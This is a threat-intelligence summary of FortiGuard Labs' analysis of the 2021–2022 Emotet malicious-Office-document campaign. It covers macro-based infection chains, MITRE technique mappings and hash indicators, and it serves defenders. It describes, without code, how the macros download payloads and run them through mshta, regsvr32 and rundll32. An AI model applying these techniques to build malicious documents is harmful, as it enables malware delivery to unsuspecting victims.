FortiGuard Labs details Emotet’s maldoc outbreak, showing a multi‑stage infection chain via malicious Office files that deploy VBA/Excel 4.0 macros to drop and run Emotet payloads. The campaign escalated from November 2021 through March 2022, with Excel documents dominating the threat surface and a shift toward older macro techniques to evade detection.
Read more: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
Read more: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak
Keypoints
- Emotet spreads via phishing emails with malicious Microsoft Office attachments (Word/Excel) that disguise themselves with “Re:” or “Fw:” in the subject line.
- Five samples tracked in the campaign show distinct macro types and file formats (VBA in Word/Excel, Excel 4.0 Macro, and mixed Excel/Word docs).
- Macros implement a chain: opening the document triggers code that creates and runs a VBS/PowerShell payload to fetch and execute Emotet DLLs.
- One technique uses Excel 4.0 Macro sheets with hidden tabs and Auto_Open to call URLDownloadToFileA, download a DLL (.ocx) and execute via regsvr32.
- Other samples leverage MSHTA/HTA and VBScript to decrypt and run PowerShell scripts that download and install Emotet DLLs via rundll32.
- From mid‑Nov 2021 to Mar 2022, the campaign showed sustained daily activity, with 2021NovW4 being the most active and Excel documents representing the vast majority of maldocs.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – Phishing emails with malicious Office attachments to trick victims; “The recent Emotet outbreak uses phishing emails combined with social engineering to trick victims into loading the malware onto their devices.”
- [T1059] Command and Scripting Interpreter – PowerShell and VBScript used to download and execute Emotet payloads; “PowerShell code snippet to download the Emotet malware dll into the ‘C:ProgramData’ folder and then execute it using ‘regsvr32.exe’.”
- [T1059.005] VBScript – VBScript within a dropped VBS file used to orchestrate the PowerShell download and execution; “In the VBS file it generates a PowerShell code snippet…”
- [T1059.007] Visual Basic – Office macros (VBA) in Word/Excel used to trigger downloads and launches; “The attached Excel files and Word documents contain malicious macros.”
- [T1218] Signed Binary Proxy Execution – Mshta/Regsvr32/Rundll32 – “The simple formula uses mshta.exe to execute an HTML URL” and “emotet malware is executed using regsvr32.exe” and “executed with rundll32.exe.”
- [T1105] Ingress Tool Transfer – The macros fetch Emotet from remote URLs for installation; “download the Emotet malware from different URLs.”
Indicators of Compromise
- [SHA256] Malicious documents – 3e97f09fc53890ba2d5ae2539b5c8df372ed2506ed217d05ff2cf8899d15b8e6, 2ecc2a48fa4eadb80367f69799277c54a0fe6dd2220a6a2dd7b81cfba328ed19, and 6 more hashes
- [SHA256] Emotet malware payloads – 4900d1e66cef8507b265c0eec3ff94cb5f774847d969e044dc8ccd72334181f5, 2dcfcaaf3ccd8e06043e651cd5b761ae50f3463c6420d067b661969e0500dce2, and 6 more hashes
Read more: https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak